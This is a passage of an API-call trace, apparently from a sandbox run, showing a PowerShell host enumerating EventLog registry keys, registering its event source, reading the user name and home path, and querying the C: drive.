	[0609.607] RegCloseKey (hKey=0x364) returned 0x0
	[0609.608] RegCloseKey (hKey=0x33c) returned 0x0
	[0609.608] RegCloseKey (hKey=0x360) returned 0x0
	[0609.609] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed248 | out: phkResult=0x1ed248*=0x360) returned 0x0
	[0609.609] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.609] CoTaskMemFree (pv=0x0) 
	[0609.609] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.609] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.609] CoTaskMemFree (pv=0x3a21e0) 
	[0609.609] CoTaskMemFree (pv=0x0) 
	[0609.609] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.609] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.610] CoTaskMemFree (pv=0x3a21e0) 
	[0609.610] CoTaskMemFree (pv=0x0) 
	[0609.610] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.610] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.610] CoTaskMemFree (pv=0x3a21e0) 
	[0609.610] CoTaskMemFree (pv=0x0) 
	[0609.610] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.610] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.610] CoTaskMemFree (pv=0x3a21e0) 
	[0609.610] CoTaskMemFree (pv=0x0) 
	[0609.610] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.610] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.610] CoTaskMemFree (pv=0x3a21e0) 
	[0609.610] CoTaskMemFree (pv=0x0) 
	[0609.610] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.610] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.610] CoTaskMemFree (pv=0x3a21e0) 
	[0609.610] CoTaskMemFree (pv=0x0) 
	[0609.611] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.611] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.611] CoTaskMemFree (pv=0x3a21e0) 
	[0609.611] CoTaskMemFree (pv=0x0) 
	[0609.611] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.611] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.611] CoTaskMemFree (pv=0x3a21e0) 
	[0609.611] CoTaskMemFree (pv=0x0) 
	[0609.611] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.611] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.611] CoTaskMemFree (pv=0x3a21e0) 
	[0609.611] CoTaskMemFree (pv=0x0) 
	[0609.611] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x33c) returned 0x0
	[0609.611] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.611] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x364) returned 0x0
	[0609.612] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.612] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x368) returned 0x0
	[0609.612] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.612] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x36c) returned 0x0
	[0609.612] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.612] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x370) returned 0x0
	[0609.612] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.612] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x374) returned 0x0
	[0609.612] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.613] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x378) returned 0x0
	[0609.613] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.613] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x37c) returned 0x0
	[0609.613] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.613] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x380) returned 0x0
	[0609.613] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x384) returned 0x0
	[0609.613] RegCloseKey (hKey=0x384) returned 0x0
	[0609.613] RegCloseKey (hKey=0x360) returned 0x0
	[0609.614] RegCloseKey (hKey=0x380) returned 0x0
	[0609.616] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed218 | out: phkResult=0x1ed218*=0x380) returned 0x0
	[0609.616] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.616] CoTaskMemFree (pv=0x0) 
	[0609.616] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.616] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.616] CoTaskMemFree (pv=0x3a21e0) 
	[0609.616] CoTaskMemFree (pv=0x0) 
	[0609.618] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.618] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.618] CoTaskMemFree (pv=0x3a21e0) 
	[0609.618] CoTaskMemFree (pv=0x0) 
	[0609.618] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.618] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.618] CoTaskMemFree (pv=0x3a21e0) 
	[0609.618] CoTaskMemFree (pv=0x0) 
	[0609.618] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.618] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.618] CoTaskMemFree (pv=0x3a21e0) 
	[0609.618] CoTaskMemFree (pv=0x0) 
	[0609.618] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.619] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.619] CoTaskMemFree (pv=0x3a21e0) 
	[0609.619] CoTaskMemFree (pv=0x0) 
	[0609.619] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.619] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.619] CoTaskMemFree (pv=0x3a21e0) 
	[0609.619] CoTaskMemFree (pv=0x0) 
	[0609.619] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.619] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.619] CoTaskMemFree (pv=0x3a21e0) 
	[0609.619] CoTaskMemFree (pv=0x0) 
	[0609.619] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.619] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.619] CoTaskMemFree (pv=0x3a21e0) 
	[0609.619] CoTaskMemFree (pv=0x0) 
	[0609.619] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.619] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x3a21e0, lpcchName=0x1ed218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.620] CoTaskMemFree (pv=0x3a21e0) 
	[0609.620] CoTaskMemFree (pv=0x0) 
	[0609.621] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x360) returned 0x0
	[0609.621] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.621] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x384) returned 0x0
	[0609.621] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.621] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x388) returned 0x0
	[0609.622] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.622] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x38c) returned 0x0
	[0609.622] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.622] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x390) returned 0x0
	[0609.622] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.622] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x394) returned 0x0
	[0609.622] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.622] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x398) returned 0x0
	[0609.622] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.623] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x39c) returned 0x0
	[0609.623] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x0) returned 0x2
	[0609.623] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x3a0) returned 0x0
	[0609.623] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed278 | out: phkResult=0x1ed278*=0x3a4) returned 0x0
	[0609.623] RegCloseKey (hKey=0x3a4) returned 0x0
	[0609.623] RegCloseKey (hKey=0x380) returned 0x0
	[0609.624] RegCloseKey (hKey=0x3a0) returned 0x0
	[0609.631] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b850008
	[0609.763] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f737d0*="WSMan", lpRawData=0x2f73540) returned 1
	[0609.765] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.765] CoTaskMemFree (pv=0x409f00) 
	[0609.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.767] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0609.767] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0609.768] CoTaskMemFree (pv=0x1b9d75b0) 
	[0609.768] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.768] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0609.768] CoTaskMemFree (pv=0x3a21e0) 
	[0609.769] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f78d08*="Alias", lpRawData=0x2f78a98) returned 1
	[0609.770] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.770] CoTaskMemFree (pv=0x409f00) 
	[0609.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.773] CoTaskMemAlloc (cb=0x804) returned 0x1b9d75b0
	[0609.773] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d75b0, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0609.774] CoTaskMemFree (pv=0x1b9d75b0) 
	[0609.774] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.774] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0609.774] CoTaskMemFree (pv=0x3a21e0) 
	[0609.774] ReportEventW (hEventLog=0x1b850008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f7e300*="Environment", lpRawData=0x2f7e090) returned 1
	[0609.775] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.776] CoTaskMemFree (pv=0x409f00) 
	[0609.776] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.776] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0609.776] CoTaskMemFree (pv=0x409f00) 
	[0609.776] CoTaskMemAlloc (cb=0x104) returned 0x409f00
	[0609.777] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x409f00, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0609.777] CoTaskMemFree (pv=0x409f00) 
	[0609.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1ed0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0609.777] SetErrorMode (uMode=0x1) returned 0x1
	[0609.777] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ed2c0 | out: lpFileInformation=0x1ed2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.777] SetErrorMode (uMode=0x1) returned 0x1
	[0609.779] GetLogicalDrives () returned 0x4
	[0609.779] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.780] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0609.781] SetErrorMode (uMode=0x1) returned 0x1
	[0609.781] CoTaskMemAlloc (cb=0x68) returned 0x1b9a1970
	[0609.782] CoTaskMemAlloc (cb=0x68) returned 0x1b9a1dd0
	[0609.782] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b9a1970, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1ed290, lpMaximumComponentLength=0x1ed28c, lpFileSystemFlags=0x1ed288, lpFileSystemNameBuffer=0x1b9a1dd0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ed290*=0x9c354b42, lpMaximumComponentLength=0x1ed28c*=0xff, lpFileSystemFlags=0x1ed288*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0609.782] CoTaskMemFree (pv=0x1b9a1970) 
	[0609.782] CoTaskMemFree (pv=0x1b9a1dd0) 
	[0609.782] SetErrorMode (uMode=0x1) returned 0x1
	[0609.782] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0609.784] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.784] SetErrorMode (uMode=0x1) returned 0x1
	[0609.785] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ed230 | out: lpFileInformation=0x1ed230*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0609.785] SetErrorMode (uMode=0x1) returned 0x1
	[0609.785] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.785] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ece80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0609.785] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
